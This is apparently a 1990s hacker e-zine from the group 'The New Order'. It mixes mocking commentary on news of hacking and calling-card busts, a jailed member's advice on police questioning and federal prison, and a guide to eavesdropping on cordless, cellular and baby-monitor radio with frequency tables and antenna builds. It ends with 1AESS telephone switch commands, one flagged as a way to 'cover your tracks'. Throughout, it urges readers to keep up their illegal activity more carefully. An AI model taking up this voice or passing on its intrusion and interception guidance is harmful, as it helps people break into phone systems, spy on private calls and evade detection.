Stern and FBI Special Agent In Charge Richard Swenson announced today that DAVID LAMACCHIA, age 20, currently a junior at the Massachusetts Institute of Technology, was charged in a one count felony indictment with conspiring to commit wire fraud. The indictment charges that between November 21, 1993 and January 5, 1994 LAMACCHIA operated a computer bulletin board service that permitted users to copy copyrighted business and entertainment software without paying to purchase the software. The bulletin board was operated without authorization on MIT computer work stations and was accessible to users worldwide over the Internet... [Losses] are estimated to exceed a million dollars. [bahaha] =-=-= "BRITISH CALLING CARD BUST" British students have taken part in an alleged £65m computer fraud, involving the electronic theft of cards that allow users to make free telephone calls around the world. The hackers, one of whom was only 17 years old, were said to be earning thousands of pounds a month selling cards... Police found one teenager driving a new £20,000 car and with computer equipment worth £29,000 in his bedroom. AT&T officials also found a computer noticeboard called "Living Chaos" that was being used to sell the cards for up to £30 each. It mentioned Andy Gaspard, an employee of the Cleartel telephone company in Washington, whose home was raided. "We found 61,500 stolen cards ready to be sent to Britain," said Eric Watley, a secret service agent in the city. (The Sunday Times, 12 February 1995) =-= "TNO BUST OF 1994 - NEW NEWS" (my comments in [ ]) ROCKY MOUNTAIN NEWS (Front Page Headline) COMPUTER-CRIME RING CRACKED (Monday June 19, 1995) Quartet accused of hacking into Arapahoe college's system, inciting illegal acts. --------------------------------------------------------------------------- (Fourth Page Article) 4 ACCUSED IN COMPUTER HACKING CASE (By Marlys Duran) Suspects used equipment at college to incite criminal acts, officials say. 
Arapahoe County - Hackers calling themselves "The New Order" [Look Ma!] allegedly gained access to the Arapahoe Community College computer and used it to distribute tips on how to commit crimes.

One man operated a computer bulletin board on which contributors from throughout the world exchanged how-to information on crimes ranging from credit-card fraud to high-tech burglary, authorities said. [Of course they fail to make that distinguishing gap that this board was NOT run off the Arapahoe system, and that it was a private BBS run out of his house]

Computers were seized from the homes of four hackers, ranging in age from 15 to 21. Secret Service experts were called in to help crack the computer files. ['type filename.txt' is hard to crack eh?]

Investigators found software for breaking passwords, lists of private passwords for several computer systems, instructions for cellular telephone fraud, private credit reports [Plural? Nope], lists of credit-card numbers and electronic manuals on how to make bombs and illegal drugs. [Yes, WE did the oklahoma bombing!@$!]

In a 97-page affidavit detailing the 18-month investigation, investigator John Davis of the Arapahoe district attorney's office said that the hackers "operate with an attitude of indifference to the rights and privacy of others and have made efforts to teach and involve others in their criminal enterprise." [What the fuck does the government do everyday?]

At the home of a Denver juvenile, authorities found hazardous chemicals and a book on how to make bombs.

Nicholas Papadenis, 21, of Broomfield, and John Patrick Jackson, 19, of Thornton, were charged last month with committing computer crimes and conspiracy. Both are scheduled to appear in Arapahoe County Court on July 5. A decision is pending on whether to charge a 15-year-old Highlands Ranch youth and a 17-year-old Denver resident, chief deputy district attorney John Jordan said Friday.

The affidavit says Papadenis, Jackson, and the youths hacked into the Arapahoe County Community College computer system, then used it to illegally distribute copyrighted computer games [Sorry, TNo doesn't have a warez division yet] and electronic magazines promoting fraud, theft, burglary and money-laundering.

One of the magazines stated, "This publication contains information pertaining to illegal acts. The use of this information is intended solely for evil purposes." [Source: CoTNo 1!@#!@]

Court documents do not indicate the hackers had political motives, and authorities declined to comment on the case. [Hackers with political motives would be way above their head.]

A Denver University expert said computer criminals usually are not motivated by ideology. They usually are young people who are "doing it for the sheer challenge of it - just to demonstrate that they're able to do it," said Don McCubbery, director for the center on electronic commerce at DU.

McCubbery estimates that authorities learn of only 5% of computer crimes. He said computer security experts generally have difficulty keeping up with the hackers. [No shit]

-----------------------------------------------

(Side note box)
THE NEW ORDER
(Bullet listing)

Some accusations listed in court documents concerning The New Order group of computer hackers:

- A hacker from the United Kingdom offered suspect John Jackson a VISA card number with a $300,000 credit limit. [Tacos anyone?]
- A computer seized from a Highlands Ranch home contained password files for computer systems at the University of Colorado at Boulder.
- A note found in Jackson's home indicated his plans to hack into the Thornton Police Department computer. [Yes, they believe everything they read]
- Jackson also had a computer file containing access information for Taco Bell and McDonald's computers. [There goes national security!]

=-=

That is all for now.
Not a good year by any means as you can tell, especially considering who else may have been busted that we didn't hear about. Don't stop what you are doing though, just be more careful of your activities. YOU are right, THEY are wrong.

=========

What Happens When You Get Caught
--------------------------------
[A.K.A The Hackers Guide to the Law and Prisons]

by D. Fanning - A.K.A. John Falcon/Renegade - TNO

Well if you are reading this, that means you are either curious or shit happened and the law reared its ugly head and they nabbed you. Now what you are about to read is absolutely fucking true. Why is this? Because I am spending the next year or so in prison for hacking. Now needless to say, I have already announced my retirement from the scene, but I still wanted to write and rant and rave about all the things that happen in this world and to clue you in on quite a few things.

Let's start with the ground rules:

1. You cannot make a deal with a cop. So when they start reading Miranda rights, keep silent or just ask inconspicuous questions like "Where are we going?", or the common one, "What's going on here? Why am I being charged?" Only a D.A. or someone in the lawyer capacity can make a deal. If a cop offers a deal, you are still going to get charged. Cops cannot make any exceptions on anyone. So drop all ideas of such.

2. Do not narc on anyone when the questioning starts. Your best bet would be to just stay silent till the lawyer shows up or something. Why? Questioning wouldn't be done unless there were gaps in their investigation. What you want is as many of those as possible. The more you have, the better it will be when plea bargaining starts up. At the very least though, let's say they do convict you, the feds and the court find you guilty or you plea that way and you are thrown into the clink. Guess who does your admissions paperwork? You guessed it, the inmates. Word has a way of coming around to dealing or giving a very wide berth to those who do the narc thing.

Key idea: "If you fall, don't bring others down too. It just adds to the load on you."

3. During questioning, they will put on a lot of plays to make you talk, they will offer you something to drink or something to make you feel more comfortable. Well why not? Spend 60 cents and get your work done for you by a confession. Makes things nice and neat. Don't fall for it. If you are thirsty, accept the drink and don't tell them shit.

4. They will also do some kind of powerplay on you. They try to make you think that they are doing you a favor, but in reality, you are digging a deeper hole for yourself.

5. The idea of you being innocent until proven guilty has gone the way of the dodo bird. When a jury sees you, the first thought that comes to mind is not if you are guilty or not, the question is HOW guilty you are. The way they see it, if you are not guilty, what are you doing in front of them in the first place? The O.J. Simpson trial is a perfect example. Also, look how many cop shows are around the box. That right there is a disgrace in my book. First they have you on film, second they pat each other on the back while you are in misery. Sick.

Well on with the show. If they have already done an investigation on you and you don't hear from them in a while, the first natural reaction would be to relax and let your guard down. WRONG ANSWER! That means that some shit is really going to go down. You should be extra careful and not talk about it to anyone. Most likely they are looking for more evidence to make it harder on you in the long run, like a wiretap. In the federal system, all you need is one person's permission to record a phone call. If you have to talk about it, use face to face contact and pat each other down to make sure there is no bug.

For instance, when I was arrested I made a fatal mistake and talked about it to one of the co-defendants and he had cut a deal with the D.A. already. My bacon was cooked when I heard my voice on a tape recording.

Well no matter what happens, sooner or later you will get nabbed so I won't get into the details of this. All I can suggest is that you really do whatever you can to get a real attorney. P.D.'s are good for some things but they get their paycheck from the same place that nabbed you in the first place so don't let that fool you too much. I will admit that it is better than nothing though.

Most likely for the computer hackers out there, they will charge you under 18-USC-1029 which is Fraudulent or Counterfeit use of an Access Device. This charge was mainly intended for credit cards but the D.A.'s have taken it to just about everything that involves computers or communications in general. Now there are some landmark cases that have beat this into the ground. One of them being U.S. vs Brady which was a guy making satellite decoders with the stops pulled out of them. He beat this due to the ruling that the signal was out there everywhere and that he merely just decoded the signal. Therefore there was no actual loss, just potential loss which doesn't count.

Another one is U.S. vs McNutt in the 10th Circuit of Utah. This guy made chips for cellular phones that would send different ESN/MIN pairs to the cell site that made it always seem like a new roamer every time he calls. The cell site just goes ahead and gives him the call because it doesn't have time to verify if it is a valid MIN/ESN pair. He won the case due to the same fact that there was no accountable loss because it never used or really billed any legit customer. The flip side of that is that, two weeks ago from when this was written, a guy was tried in LA for the exact same thing and was found guilty, appealed the case, won the appeal, then the government re-appealed it and he lost again. This caused a split in the court circuits which means that this will go to the Supreme Court. Remember that the government or any government agency will not press any issue unless there is some kind of financial deal behind it because they are wasting time and resources on you when they can be getting Joe Blow Cartel Drug Dealer.

So they find you guilty or you plea. The next step is the Pre-Sentence Investigation. They basically take a fine tooth comb and find any dirt about you that they can. You will be amazed about all the things they can do to make you seem like a threat to society, the American way of life, apple pie and all... All you can do is make sure or try your hardest to make it as clean as possible. Now I got ripped hard on mine due to very strained relations with one of my parents and they managed to throw everything that anyone had ever said about me together to make it look like I was truly evil. That is where the cops will come back and haunt you because everything you say will be in that report. Every little action and all will be written with the slant of a cop. (Needless to say who writes the report kids... The U.S. Probation Office, a branch of the Secret Service and the F.B.I.)

Well you are convicted and here you are. Depending on where you live, you will either be bussed/vanned to the prison where they choose for you or they will fly you there. After you are sentenced you now belong to the Bureau of Prisons (A D.O.J. branch). Basically you will be taken to a county jail for holding while they classify you and then you get transported out. When I was transported out, I was in shackles and all taking a ride on Fed Air. The USM's have a fleet of 737's they confiscated from drug busts and converted them into their own use. You are basically bussed out to an unused or empty part of the airport and with a large ring of USM's with shotguns in their hands, you get put onto an airplane and given a box lunch and off you go.

I went from Portland to Sacramento to Phoenix in one day. Spent the night at the FCI in Phoenix then the next morning from there to Lompoc where I am now. Remember these words though... You are now property of the B.O.P. Basically you are luggage, they can transport you at any time whenever they want to. But, depending on where you go, it isn't all that bad. Most likely you will meet friends or acquaintances that will help you along. Just ask a few questions and usually they will know. One thing to never do is be secretive about why you are there. You are there, most likely someone else is there for the same thing and you can get a strong fellowship going with people in the same predicament.

One thing to always keep in mind from now to eternity, no matter where you go. The feds are nailing everyone for 'Conspiracy'. It's a damn shame when you go to a place where 90 percent of the inmate population is here on some kind of drug related charge and of that 90%, 35% are here on conspiracy related charges. Truly something to think about.

Now for the hackers and phreakers that are facing jail. If your PSI report even breathes any mention of some kind of use with the computer, you will be banned from that. 3 days ago I was given a list of direct orders to avoid all contact of that. Likewise, they put a restriction on the levels of computer related material that I can read. Usually you can get any periodical you want except for things that deal with gay man on man stuff. Just like the gay people feel, that smells of discrimination but that's just the way it is.

Phones are something else that you will wish would change real quick. The phones are run by a B.O.P. thing called ITS - Inmate Telephone Services. Basically it's a Unix run PBX that limits the people you can call and it throws the bill on you. No more collect calls or anything of that nature. Just doesn't happen. But the inmates have won a class action suit against the B.O.P.
about this and the government right now is appealing it. Technically with a suit or even an appeal, you have to implement it as soon as you can after the judgement is made. But it's been a year since they won it and nothing changes. Basically it's the government stalling.

Well that's all for me to say this time around. Remember to keep the dream alive and judge for yourself with that piece of gray matter between your ears. You can write any comments to me at:

Fanning Reg No. 12617-006
3600 Guard Road
Lompoc, CA 93436

or e-mail at ice@alaska.net or jfalcon@ice-bbs.alaska.net (I prefer the first method to save my friends postage costs.)

Keep it strong - TNO (The New Order)
John Falcon - Ex-TNo 1981-1994

=========

--- Legal and Technical Aspects of RF Monitoring ---
--- Major [TNo] ---

SYNOPSIS
--------

The "Cordless Fun" (Noam Chomski, 2600 Magazine Summer 1994) article doubtlessly sparked an interest in cordless phone monitoring. Wireless telephones are a prime target for monitoring. Both cordless and cellular telephones are nothing more than radio transceivers that, at some point, interface with the telephone system. This article will seek to expand on and clarify some points made in "Cordless Fun", and also to point to some other areas of interest.

=============================================================================

CORDLESS
--------

Legal Stuff:

Monitoring cordless phones is now a federal crime! Recent legislation prohibits listening in on cordless phones, much the same as cellular phones. Also, the Communications Act of 1934 makes it a crime to divulge anything you monitor to another person. It is also illegal to use anything that you hear for personal gain. Note that this applies to anything that you monitor, not just cordless phones. On the other hand, there are presently no restrictions on scanners that are capable of receiving cordless phone frequencies. However, I suspect that in the near future the feds will deny certification to such scanners, as they did with scanners that could receive cellular frequencies.

Technical Stuff:

Cordless telephones transmit and receive with very low power. This is primarily to minimize interference with other nearby cordless telephones. This makes scanning for cordless telephones a short-range endeavor. Most cordless phones of recent manufacture operate in the 46-49MHz range. However, the FCC has recently opened up a part of the 900MHz spectrum for cordless telephone usage. The new 900MHz phones often offer greater range and increased clarity. There are also models sporting "spread-spectrum" technology, which makes monitoring with conventional scanning-receivers a virtual impossibility.

Another security measure on some cordless phones involves encoding the DTMF tones sent from the handset to the base. This prevents the base from accepting tones from other, unauthorized, handsets. It does not hinder monitoring the calls, but the DTMF tones will not be recognizable.

In the 46-49MHz phones, there are ten frequency pairs available. Many older phones only utilize one pair. Newer, more expensive, phones can utilize all ten pairs. Some automatically search for an open channel, while others can be manually manipulated to find a channel with less noise. Likewise, the new 900MHz phones will scan to find a clear channel.

CELLULAR
--------

Legal Stuff:

Intercepting cellular mobile telephone (CMT) traffic is illegal. The Electronic Communications Privacy Act of 1986 made it so. Scanners that receive the CMT portion of the 800MHz range may no longer be manufactured, sold, or imported into the U.S. Many scanners were designed to scan this area, though. When the Cellular Telephone Industry Association began complaining about this fact, most scanner manufacturers/resellers voluntarily "blocked" the cellular freqs from their scanners. This pacified the CTIA for a while, but the "blocks" were easily hackable. Typically, restoring a "blocked" scanner involved removing a single diode, a ten minute job for even the most devout technophobe. This fact led to the passage of the Telephone Disclosure and Dispute Resolution Act (TDDRA), which denies F.C.C. certification of scanners that receive cellular freqs, or those which may be easily modified to do so. New scanners will be "blocked" at the CPU, and hacking them is unlikely.

Frequency converters offered another means of monitoring cellular and other 800MHz traffic. Essentially, a converter receives an 800MHz signal, and converts it to a 400MHz signal that the scanner is capable of receiving. Converters are useful for scanners that have no 800MHz reception capabilities, as well as those that have portions of the 800MHz band blocked. Unfortunately, converters were also outlawed by the TDDRA. They are still legal in kit-form, however. Another option would be to build one from scratch, which isn't an especially difficult project.

Technical Stuff:

The word "cellular" defines the cellular phone system. A service area is broken up into many small cells. As a user travels through an area, his call will be handed off from one cell to the next. This handoff is transparent to the user, but a monitor will lose the conversation. Cellular phones use low power (a maximum of five watts) so that a cell phone will not attempt to seize more than one site at a time. When a call is initiated by a cell phone, the nearest site will respond, and assign an available frequency to the phone. When the user moves into range of the next site, the process repeats itself, and the new site will assign a new frequency. Therefore, it can be difficult to track a particular conversation as it moves from site to site with a single scanner.

Every area served by cellular phones will have two service providers. One will be the local RBOC, while the other will be a cellular-only provider. The two systems are designated as "A" and "B" systems, or "Wireline" and "Non-Wireline". There is no difference between the two for monitoring purposes, but since "A" and "B" carriers use different frequencies, it should be possible to identify local cell-towers as being "A" or "B" sites.

PHONE PATCH
-----------

Legal Stuff:

The Communications Act of 1934 applies here as well, but there are no other prohibitions on monitoring business-band phone patches.

Technical Stuff:

Many business radio systems have the ability to tie into the phone system. Most of these systems will be found in 800MHz trunked radio systems. In a conventional radio system, one frequency will equal one channel. In a trunked system, however, frequencies and channels are independent of each other. The trunking computer will assign a different frequency to a radio each time it transmits, and it will send a signal to other radios on the same channel, telling them the current frequency in use.

Phone patches are easy to monitor, though. Since the radio on a phone patch is transmitting constantly, the frequency used will remain the same for the duration of the conversation. Many people mistakenly believe these calls to be cellular, but they are not. Most phone patches found in 800MHz trunked systems will be full-duplex, just like cellular and home phones. Some systems, especially in UHF (around 450MHz) and 800MHz conventional radio systems, will only be half-duplex, though. In those systems, only one person can talk at a time, just like normal two-way radios.

Radio systems are typically designed to offer service to an entire metropolitan area, so range is quite good. The mobile radio will transmit its signal to a strategically located "repeater", which then re-broadcasts the signal with much more power. So long as a scanner is within reception range of the repeater output, monitoring will be possible regardless of the location of the party transmitting.

EQUIPMENT
---------

Legal Stuff:

Some states prohibit mobile use of scanners. Also, it is illegal to use a scanner in the commission of a crime.

Technical Stuff:

There is a scanner for every appetite. What sort of monitoring one wants to do will dictate which scanner one buys. For someone interested only in cordless phones, a ten-channel scanner with no 800MHz coverage will be quite adequate, and much cheaper than a more capable scanner. For someone interested in cellular, a full-coverage 800MHz scanner with a much greater frequency storage capacity will be necessary. Base, mobile or handheld? Depends entirely on how it will be used.

Modern scanners are programmable, while older units require crystals. For someone wanting to monitor only a few channels (such as cordless phones, or the local police), a crystal-controlled scanner would be adequate, and much cheaper. But for more serious and varied scanning, programmable units are a necessity. Models are available that store between 10 and 1000 channels. Uniden/Bearcat and Realistic are the two most commonly available brands in the U.S. (although Realistic isn't actually a brand, just a label... Radio Shack scanners are all manufactured by Uniden or GRE, depending on the model).

Because of the TDDRA, many of the best scanners from the past several years are no longer available, but watch for Hamfests (great electronic flea-markets... inquire at your local ham radio/electronics store), garage sales, etc. There is nothing in the TDDRA or other current legislation that prevents private parties from owning or selling pre-TDDRA equipment.

Aside from the scanner itself, the next-most important piece of equipment is the antenna. Handheld scanners will generally utilize an "all-band" rubber-duck antenna (a flexible, rubberized antenna, between 8-14" in length), while base units will have a telescoping metal whip antenna. These antennas are adequate for receiving strong, local signals, but more discriminating monitors will demand more. For base units, an all-band discone type antenna, mounted outside as high as practical, will offer good, omnidirectional performance. For those who only want to monitor a particular band, it would be best to use an antenna cut specifically for that band. Likewise, for those monitoring signals coming from one general direction, a directional antenna will offer better performance than an omnidirectional unit. For mobile use, using an antenna mounted on the vehicle will greatly improve reception.

MISCELLANEOUS COMMUNICATIONS
----------------------------

Voice-pagers can offer interesting monitoring. While the data-transmissions that send the signal to the proper pager are proprietary digital signals (and as such, illegal to monitor or decipher), the actual "voice messages" are transmitted "in the clear".

Packet-radio is used by ham radio operators. They have a vast network of computer BBS's that operate independently of the phone system. Modulated data is sent over the airwaves with a ham transceiver, where it is received and de-modulated with a Terminal Node Controller (TNC). Expect the use of wireless data transmissions to increase over the next few years, and not just among ham operators.

While not having anything to do with telephones, the "baby monitors" people use are transmitters just like cordless phones. They are also low-power devices, so range is limited. Most people who use these devices would be shocked to learn that they are "bugging" their own home.

PRESENT AND FUTURE CHALLENGES
-----------------------------

Spread spectrum, digital transmissions, encryption... these are all factors that are affecting monitoring today.
While most cellular systems are presently analog systems, there are operational digital systems in some areas. Scanners that are currently available won't be able to decipher the digital communications, and it is unlikely that digital-capable scanners will be produced. That means it will be up to the hackers to provide the technology to intercept these communications. Spread spectrum is quite hackable, as it was never intended as an encryption system, per se, yet the phone manufacturers are certainly marketing it as such. And one oft-overlooked advantage of the Clipper chip is the fact that the backdoor can be exploited by hackers as well as the government. In the meanwhile, there are plenty of intercepts to be had, and there will continue to be.

=================================================================
For More Information:
=================================================================

Scanner Modification Handbook (Vols. I & II), by Bill Cheek

The scanner modification handbooks offer a plethora of information on hacking scanners. Hacks include: increased channel capacity (example: RS PRO-2006 from 400 channels to 6,400!), adding signal-strength meters, cellular-freq. restoration, scanning-speed increases, and much more.

World Scanner Report, by Bill Cheek

A monthly newsletter on the latest scanner hacks.

Available from:
COMMtronics Engineering
Box 262478
San Diego, CA 82196-2478
BBS: (619) 578-9247 (5:30PM to 1:30PM P.S.T. ONLY!)

COMMtronics Engineering also offers a scanner-computer interface for RS PRO-43/2004/2005/2006 model scanners.

===================================================================
CRB Research Books
Box 56
Commack, NY 11725

CRB has books on scanner modifications, frequency guides, and other interesting subjects.

=================================================================
POPULAR COMMUNICATIONS
CQ Publications
76 N. Broadway
Hicksville, NY 11801
(516) 681-2926

Pop Comm is a monthly magazine on all sorts of radio monitoring, including scanning, shortwave, and broadcast.

==================================================================
MONITORING TIMES
Grove Enterprises, Inc.
P.O. Box 98, 300 S. Highway 64 West
Brasstown, North Carolina 28902-0098

M.T. is a monthly magazine covering all varieties of radio communications.

==================================================================
NUTS & VOLTS

Nuts & Volts is a monthly magazine that covers a wide variety of electronic-related subjects.

T&L Publications, Inc.
430 Princeland Court
Corona, CA 91719
(909) 371-8497
(909) 371-3052 fax
CI$ 74262,3664
1-800-783-4624 SUBSCRIPTION ORDERS ONLY

===================================================================
USENET:
alt.radio.scanner
rec.radio.scanner

===================================================================
Charts & Tables:

 1. Cordless Telephone Frequencies (VHF)
 2. Cordless Telephone Frequencies (900MHz)
 3. Cellular Telephone Frequencies
 4. Business Band Frequencies (VHF, UHF, 800MHz)
 5. IMTS Frequencies
 6. PAGER Frequencies
 7. PACKET Frequencies
 8. ROOM MONITOR Frequencies
 9. homebrew cordless dipole antenna
10. homebrew 1/4 wave groundplane antenna

=================================================================
TABLE 1 - CORDLESS TELEPHONE FREQS. (CONVENTIONAL)

CH   BASE     HANDSET
--   ----     -------
 1   46.100   49.670
 2   46.630   49.845
 3   46.670   49.860
 4   46.710   49.770
 5   46.730   49.875
 6   46.770   49.830
 7   46.830   49.890
 8   46.870   49.930
 9   46.930   49.990
10   46.970   46.970

=================================================================
TABLE 2 - 900MHz CORDLESS FREQS.

Cordless phones have been allocated the frequencies between 902-928MHz, with channel spacing between 30-100KHz. Following are some examples of the frequencies used by phones currently on the market.
----------------------------------------------------------------
Panasonic KX-T9000 (60 Channels)

base     902.100 - 903.870   Base frequencies (30KHz spacing)
handset  926.100 - 927.870   Handset frequencies

CH  BASE    HANDSET   CH  BASE    HANDSET   CH  BASE    HANDSET
--  ------- -------   --  ------- -------   --  ------- -------
01  902.100 926.100   11  902.400 926.400   21  902.700 926.700
02  902.130 926.130   12  902.430 926.430   22  902.730 926.730
03  902.160 926.160   13  902.460 926.460   23  902.760 926.760
04  902.190 926.190   14  902.490 926.490   24  902.790 926.790
05  902.220 926.220   15  902.520 926.520   25  902.820 926.820
06  902.250 926.250   16  902.550 926.550   26  902.850 926.850
07  902.280 926.280   17  902.580 926.580   27  902.880 926.880
08  902.310 926.310   18  902.610 926.610   28  902.910 926.910
09  902.340 926.340   19  902.640 926.640   29  902.940 926.940
10  902.370 926.370   20  902.670 926.670   30  902.970 926.970
31  903.000 927.000   41  903.300 927.300   51  903.600 927.600
32  903.030 927.030   42  903.330 927.330   52  903.630 927.630
33  903.060 927.060   43  903.360 927.360   53  903.660 927.660
34  903.090 927.090   44  903.390 927.390   54  903.690 927.690
35  903.120 927.120   45  903.420 927.420   55  903.720 927.720
36  903.150 927.150   46  903.450 927.450   56  903.750 927.750
37  903.180 927.180   47  903.480 927.480   57  903.780 927.780
38  903.210 927.210   48  903.510 927.510   58  903.810 927.810
39  903.240 927.240   49  903.540 927.540   59  903.840 927.840
40  903.270 927.270   50  903.570 927.570   60  903.870 927.870
------------------------------------------------------------
V-TECH TROPEZ DX900 (20 CHANNELS)

905.6 - 907.5   TRANSPONDER (BASE) FREQUENCIES (100 KHZ SPACING)
925.5 - 927.4   HANDSET FREQUENCIES

CH  BASE    HANDSET   CH  BASE    HANDSET   CH  BASE    HANDSET
--  ------- -------   --  ------- -------   --  ------- -------
01  905.600 925.500   08  906.300 926.200   15  907.000 926.900
02  905.700 925.600   09  906.400 926.300   16  907.100 927.000
03  905.800 925.700   10  906.500 926.400   17  907.200 927.100
04  905.900 925.800   11  906.600 926.500   18  907.300 927.200
05  906.000 925.900   12  906.700 926.600   19  907.400 927.300
06  906.100 926.000   13  906.800 926.700   20  907.500 927.400
07  906.200 926.100   14  906.900 926.800
------------------------------------------------------------
OTHER 900 MHZ CORDLESS PHONES

AT&T #9120 - - - - -    902.0 - 905.0 & 925.0 - 928.0 MHZ
OTRON CORP. #CP-1000    902.1 - 903.9 & 926.1 - 927.9 MHZ
SAMSUNG #SP-R912- - -   903.0 & 927.0 MHZ
------------------------------------------------------------

==================================================================
TABLE 3 - CELLULAR TELEPHONE FREQUENCIES

wireline ("b" side carrier)        824.1000-834.9000   869.0100-879.9900
non-wireline ("a" side carrier)    835.0200-849.0000   880.0200-894.0000

==================================================================
TABLE 4 - BUSINESS BAND RADIO FREQS.

151.5050-151.9550MHz
154.4900-154.5400
460.6500-462.1750
462.7500-465.0000
471.8125-471.3375
474.8125-475.3375
896.0125-900.9875
935.0125-939.9875
806.0125-810.9875
811.0125-815.9875
816.0125-820.9875
851.0125-855.9875
856.0125-860.9875
861.0125-865.9875

=================================================================
TABLE 5 - MOBILE TELEPHONE FREQS.
(see note1 below)

SIMPLEX    OUTPUT     INPUT      OUTPUT     INPUT
--------   --------   --------   --------   --------
035.2600   152.0300   158.4900   454.3750   459.3750
035.3000   152.0600   158.5200   454.4000   459.4000
035.3400   152.0900   158.5500   454.4250   459.4250
035.3800   152.1200   158.5800   454.4500   459.4500
035.5000   152.1500   158.6100   454.4750   459.4750
035.5400   152.1800   158.6400   454.5000   459.5000
035.6200   152.2100   158.6700   454.5250   459.5250
035.6600*  454.0250   459.0250   454.5500   459.5500
043.2200*  454.0500   459.0500   454.5750   459.5750
043.2600   454.0750   459.0750   454.6000   459.6000
043.3400   454.1000   459.1000   454.6250   459.6250
043.3800   454.1250   459.1250   454.6500   459.6500
043.4200   454.1500   459.1500
043.3000   454.1750   459.1750
043.5000   454.2000   459.2000
043.5400   454.2250   459.2250
043.5800*  454.2500   459.2500
043.6400*  454.2750   459.2750
152.2400*  454.3000   459.3000
152.8400*  454.3250   459.3250
158.1000*  454.3500   459.3500
158.7000*

*-also allocated for pager usage

(note1: These freqs are, for the most part, dead. The FCC has reallocated most of these for other services.)
=================================================================
TABLE 6 - PAGER FREQUENCIES

035.2200   035.5800   152.4800   154.6250   158.4600
157.7400   465.0000   462.8000   462.7750   462.9250
462.7500   462.8750   462.8250   462.9000   462.8500
928.0000   929.0000   930.0000   931.0000

=================================================================
TABLE 7 - PACKET FREQUENCIES

050.6200
223.5200-223.6400
223.7100-223.8500
2303.500-2303.800
2303.900
2399.000-2399.500

=================================================================
TABLE 8 - BABY MONITOR FREQUENCIES

49.300   49.830   49.845   49.890

=================================================================
TABLE 9 - AIR PHONE FREQUENCIES

OUTPUT     INPUT
454.6750   459.6750
454.9750   459.9750
849.0000   851.0000
894.0000   896.0000

==================================================================
CHART 10 - IMPROVED ANTENNA FOR CORDLESS MONITORING

The best way to improve the range for monitoring cordless telephones is to use an antenna specifically cut for the frequencies used in cordless phones. The following is a very effective, yet easy to build, "homebrew" antenna.

CORDLESS DIPOLE
---------------

materials needed:

wire - virtually any type will suffice
matching transformer (RS part number 15-1296)
f connector (RS part number 278-225)
??? connector (this will connect the antenna to the scanner, so it will be dependent upon what type of antenna jack the scanner utilizes. Most use a BNC-type connector. Some older models will use a Motorola-type connector.)
coax cable - while many types of coax can be used, a low-loss cable would be best, especially if a long cable run is required. RG-6 satellite coax (RS part number 278-1316) is a good choice.
            wire               transformer               wire
  -------------------------<           >-------------------------
                                  +   f connector
                                  |
                                  |   coax
                                  |
                                  |
                                  *   connector
                                 [ ]  scanner

=================================================================
CHART 11 - 1/4 WAVE GROUND PLANE ANTENNA

Here is a simple-to-build antenna that will improve reception for a particular frequency area.

materials needed:

wire - a rigid wire is needed here. Clothes hangers work well.
panel mount SO-239 connector (RS part number 278-201)
male PL-259 connector (RS part number 278-205)
coax cable
connector (to scanner)

            |
            |
            |
            |
           [ ]
          /   \
         /     \
        /       \

The length of the five rods will be dependent upon the frequency you intend to monitor (as the name says, each rod is cut to one quarter of the wavelength). Use the following formula:

WL = 3X10^8 / F

WL = wavelength (in meters)
F = frequency (in MHz)

(Note on units: 3X10^8/F gives meters only when F is in Hz. With F in MHz, as written here, use WL = 300/F; for example 46.7 MHz gives WL of about 6.4 m, so a quarter-wave rod is about 1.6 m.)

=========

          -=-        -= The Tao of 1AESS =-        -=-
                     -=-=-=-=-=-=-=-=-=-=-=
                     -= DeadKat & Disorder =-
          -= Special thanks to Gatsby and Mark Tabas =-

Introduction
-=-=-=-=-=-=

The Bell System's first trial of electronic switching took place in Morris, Illinois, in 1960. The Morris trial culminated a 6-year development and proved the viability of the stored-program control concept.

The first application of electronic local switching in the Bell System occurred in May 1965 with the cutover of the first 1ESS switch in Succasunna, New Jersey. The 1ESS switching system was designed for use in areas where large numbers of lines and lines with heavy traffic (primarily business customers) are served. The system has generally been used in areas serving between 10,000 and 65,000 lines and has been the primary replacement system for urban step-by-step and panel systems. The ease and flexibility of adding new services made 1ESS switching equipment a natural replacement vehicle in city applications where the demand for new, sophisticated business and residence services is high.

In 1976, the first electronic toll switching system to operate a digital time-division switching network under stored-program control, the 4ESS system, was placed in service.
It used a new control, the 1A processor, for the first time to gain a call-carrying capacity in excess of 550,000 busy-hour calls. The 1A processor was also designed for local switching application. It doubled the call-carrying capacity of the 1ESS switching system and was introduced in 1976 in the first 1AESS switch. The network capacity of 1ESS switching equipment was also doubled to allow the 1AESS switch to serve 130,000 lines.

In addition to local telephone service, the 1AESS switches offer a variety of special services. Custom Local Area Switching Services (CLASS) are available as well as Custom Calling Services. Business customers may select offerings such as centrex, ESS-ACS, Enhanced Private Switched Communications Service, or electronic tandem switching. Although more modern switches like 5ESS and DMS 200 have been developed, it is estimated that some 50 percent of all switches are still 1AESS.

Commands
-=-=-=-=

The 1AESS uses a command line interface for all commands. The commands are divided into three fields: action, identification, and data. The fields are always separated by a colon. Every command is terminated by either a period for verification commands or a 'ballbat' (!) for change commands. The control-d is used to execute the command instead of a return. The underscore is used as a backspace. Commands are always typed in 'all caps'.

The action field is the first field of the command and is ended by a colon. The identification field is ended by the second colon. The identification field has one or two subfields which are separated by a semicolon. Semicolons are not used elsewhere in the command. The data field consists of keyword units and is the remaining portion of the command.

Basic Machine Commands
-=-=-=-=-=-=-=-=-=-=-=

These commands provide useful information from the system. The WHO-RV- command will tell you what CO it is and what version of the OS is installed. If your output is scrolling off the screen press space to end scrolling.
The V-STOP- command will clear the buffer.

WHO-RV-.        System information.
SPACE           Stops output from scrolling.
V-STOP-.        Free buffer of remaining LENS/INFO.

Channel Commands
-=-=-=-=-=-=-=-=

Channel commands are used to redirect input and output. If a switch won't respond to a command use the OP:CHAN command to check on the current channel. If your channel is not responding, use the MON:CHAN command to switch output and control to your terminal (the remote). You can check the status of the RC with the RCCENSUS command.

OP:CHAN:MON!                    Shows all channels which are being monitored.
MON:CHAN SC1;CHAN LOC!          Redirect output to remote screen.
STOP: MON;CHAN SC1;CHAN LOC!    Redirect output to local screen. (This command needs to be done after you are finished to help cover your tracks)
OP:RCCENSUS!                    To see recent change status.

Tracing Commands
-=-=-=-=-=-=-=-=

CI-LIST- will give you a list of all numbers which are being traced externally. It will not show you lines which are being traced internally, i.e. numbers inside one of the prefixes controlled by the switch you are on.

CI-LIST-.       Traced line list.

Check Features on Line
-=-=-=-=-=-=-=-=-=-=-=

The VF command is used to check the current settings on a line. The DN XXXXXXX specifies the phone number of the line you wish to check. Replace XXXXXXX with the seven digit phone number of the line you are checking.

